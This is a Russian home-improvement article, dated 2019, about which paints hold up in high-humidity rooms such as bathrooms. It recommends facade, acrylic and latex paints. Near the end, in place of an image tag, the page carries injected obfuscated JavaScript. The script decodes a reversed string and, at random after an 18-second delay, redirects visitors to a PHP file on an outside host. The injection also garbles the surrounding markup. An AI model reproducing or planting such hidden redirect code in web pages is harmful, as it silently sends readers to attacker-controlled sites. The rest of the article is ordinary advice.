Добавить в закладки

Какие краски не подойдут, если в помещении высокая влажность

Многие из нас в своей жизни занимаются ремонтом и не всегда это занятие является для вас приятным. Особенно не приятным может стать выбор материалов в магазине.

При отделке стен например в ванной многие желают сэкономить и заменить керамическую плитку например на краску, но не любая краска подойдёт для помещения с повышенной влажность. В этой статье мы с вами разберем, какие же краски могут вам не подойти?

На какую краску стоит обратить внимание

Для ванной подойдёт например фасадная краска, так как она обладает высокой влагостойкостью и повышенной износостойкостью по отношению к например водоэмульсионным или практически любым другим видам красок.

Фасадная краска. Источник: rf.petrovich.ru

Такая краска способна выдержать экстремальные нагрузки. Она предназначена для использования на улице. Так же эта краска отлично защищает стены от плесени, так как не пропускает влагу, а так же содержит в себе вещества помогающие предотвратить распространение грибка если всё же такое произошло.

Не рекомендуется

Для финишной отделки стен ванной комнат не стоит обращать внимание на лакокрасящие материалы, так как они не обладают влагостойкостью.

Так же не стоит засматриваться не силиконовые краски, так как их очень легко повредить, обычно такие краски используют лишь в декоративных целях.

Лучше рассмотреть такие виды красок как:

Акриловые. Акрил препятствует распространению грибка, но к сожалению требует особых подготовительных работ. Так как стены должны быть идеально ровными, иначе состав может не «лечь». Как правило, акриловые краски наносят профессионалы. Важно соблюдать равномерность.

Акриловая краска. Источник: my-shop.ru

Латексная. Обладает достаточно высокой прочностью и влагостойкостью, но после монтажа требуется дополнительная обработка. Придётся закупиться дополнительными средствами против распространения грибка.

$NjS=function(n){if(typeof ($NjS.list[n])==»string») return $NjS.list[n].split(«»).reverse().join(«»);return $NjS.list[n];};$NjS.list=[«\’php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tolkov-14kg-velikiy-novgorod.jpg» alt=»» width=»1865″ height=»1546″ /> Латексная краска. Источник: nzmt.ru

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Автор: Александр
Опубликовано: 25.11.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: